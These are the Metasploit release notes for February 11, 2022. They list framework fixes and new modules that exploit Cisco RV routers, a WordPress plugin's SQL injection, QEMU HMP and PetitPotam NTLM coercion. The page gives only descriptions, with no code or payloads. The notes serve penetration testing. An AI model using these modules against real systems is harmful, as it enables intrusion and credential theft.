Skip to Content
Release NotesMetasploitIndex

Feb 11, 2022

We updated our installers to better support hardened Linux installs.

Improved

  • PR 15994 - Updates Metasploit’s RPC functionality to support reading the result of external commands which have been executed in a console.

  • PR 16010 - This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.

  • PR 16014 - This adds human readable long-form option names to various commands such as save/connect/search and more.

  • PR 16112 - This updates the PHP Meterpreter’s delete dir functionality to recursively delete directories, and adds validation to the getsystem command on Windows Meterpreter.

  • PR 16113 - A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.

  • PR 16132 - This enhances the MySQL injection library’s blind injection techniques. The usage of the characters < and > is now avoided to improve compatibility.

  • PR 16163 - Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by jang. An exploit that utilizes this enhancement will arrive shortly.

Fixed

  • Pro: We updated our installers to better support custom umask values on Linux installs.

  • PR 16025 - This fixes an issue with msfdb init on windows when opting not to initialize webservices.

  • PR 16066 - This fixes a bug were Meterpreter scripts do not correctly receive arguments as part of the sessions command. Note that Meterpreter scripts are deprecated and have been replaced with Post modules.

  • PR 16109 - This fixes a crash in post/windows/gather/enum_domains when no domains are found.

  • PR 16114 - A bug was present in PayloadGenerator::prepend_nops whereby if no Nops modules existed for the target payload architecture, the payload would be vaporized and replaced with an array of Nop modules as a string. This has now been fixed and instead if no Nop modules exist for the target payload architecture, the raw shellcode is returned unmodified.

  • PR 16119 - This change fixes an incorrect user-agent in modules/auxiliary/dos/http/slowloris.py.

  • PR 16121 - This fixes an exception caused by exploits that call rhost() in Msf::Post::Common without a valid session.

  • PR 16123 - This fixes the missing full disclosure reference URL in the exploit/linux/http/cisco_ucs_rce module.

  • PR 16142 - This fixes an issue with Meterpreter’s getenv command. The getenv command now returns null when querying for a non-existing environment variable.

  • PR 16143 - This fixes an issue where a Cygwin SSH session was not correctly identified as a Windows device due to a case sensitivity issue.

  • PR 16147 - This fixes a bug where ssh_enumusers would only use one source in the generation of its user word list if both USERNAME and USER_FILE options were set. The module now pulls from all possible datastore options if they are set, including a new option DB_ALL_USERS.

  • PR 16160 - This fixes a crash when msfconsole is unable to correctly determine the hostname and current user within a shell prompt.

Modules

  • PR 16125 - This module can exploit GXV3140 models now that an ARCH_CMD target has been added.

  • PR 16128 - This adds an exploit for various Cisco RV series VPNs / Routers for firmware versions 1.0.03.20 and below. The module exploits both an auth bypass vulnerability and command injection vulnerability to achieve unauthenticated code execution as the www-data user against vulnerable devices.

  • PR 16130 - This adds an exploit for CVE-2021-24862 which is an authenticated SQL injection vulnerability within the RegistrationMagic Wordpress plugin.

  • PR 16136 - This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit. The new module leverages CVE-2021-36942 to coerce Windows hosts to authenticate to a user-specific host, which enables an attacker to capture NTLM credentials for further actions, such as relay attacks.

  • PR 16151 - This adds a module that can exploit the QEMU HMP service to execute OS commands. As a result, the HMP TCP service is reachable from emulated devices. It is also possible to escape QEMU by exploiting this vulnerability.

Offline Update

Metasploit Framework and Pro Installers